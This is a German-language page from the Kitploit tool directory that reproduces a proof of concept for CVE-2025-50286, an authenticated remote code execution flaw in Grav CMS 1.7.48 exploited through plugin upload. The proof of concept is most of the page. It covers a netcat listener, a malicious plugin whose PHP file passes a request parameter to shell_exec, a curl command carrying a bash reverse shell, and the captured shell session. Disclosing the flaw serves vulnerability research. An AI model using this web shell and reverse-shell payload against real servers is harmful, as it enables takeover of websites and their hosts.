Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-50286 — Authentifizierter RCE-Exploit für Grav CMS über Plugin-Upload, der beliebige PHP-Codeausführung und Reverse-Shell demonstriert. | Kitploit
Tools/GitHubGitHub/binneko/cve-2025-50286
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubbinneko/cve-2025-50286

CVE-2025-50286

Authentifizierter RCE-Exploit für Grav CMS über Plugin-Upload, der beliebige PHP-Codeausführung und Reverse-Shell demonstriert.

Repository anzeigen
212vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Grav CMS v1.7.48 / Admin Plugin v1.10.48 - Authentifizierte RCE via Plugin-Upload (CVE-2025-50286)

Grav CMS v1.7.48 mit Admin Plugin v1.10.48 ist anfällig für Remote Code Execution (RCE) über die „Direct Install“-Plugin-Upload-Funktion, die authentifizierten Administratoren erlaubt, beliebigen PHP-Code auf dem Server auszuführen.

CVE-ID

CVE-2025-50286

Zusammenfassung

  • Typ: Authentifizierte Remote Code Execution (RCE)
  • Ort: /admin/tools/direct-install (Admin-Panel > Werkzeuge > Direktinstallation)
  • Auswirkung: Beliebige PHP-Codeausführung und potenzielle vollständige Systemkompromittierung
  • Erforderliche Authentifizierung: Ja (Administratorzugriff)
  • Betroffene Version: Grav CMS v1.7.48 / Admin Plugin v1.10.48

Proof of Concept

  1. Bereiten Sie einen Listener vor:

    root@kitploit:~
    nc -lvnp 4444
    
  • Melden Sie sich als Administrator im Grav Admin-Panel an.

  • Navigieren Sie zu Werkzeuge > Direktinstallation

  • Laden Sie eine bösartige Plugin-ZIP (evilplugin.zip) mit folgender Struktur hoch:

    root@kitploit:~
    evilplugin/
    ├── evilplugin.php         ← enthält: shell_exec($_GET['cmd'])
    └── blueprints.yaml        ← minimales Blueprint zur Validierung
    
  • Lösen Sie die Reverse Shell aus:

    root@kitploit:~
    curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
    
  • Reverse Shell empfangen:

    root@kitploit:~
    $ nc -lvnp 4444
    Listening on 0.0.0.0 4444
    Connection received on <target-ip>
    www-data@target:/var/www/html$ whoami
    www-data
    
  • Betroffene Komponente

    • Endpunkt: /admin/tools/direct-install
    • Funktionalität: Plugin-Upload und Autoload ohne Validierung

    Getestet auf

    • Debian 11
    • Apache2 + PHP 7.4
    • Grav CMS v1.7.48 (mit Admin Plugin v1.10.48)

    Entdecker

    @binneko

    Referenzen

    • Grav CMS GitHub
    • CVE-Eintrag - CVE-2025-50286

    Haftungsausschluss

    Nur zu Bildungs- und Sicherungszwecken.

    Tool herunterladen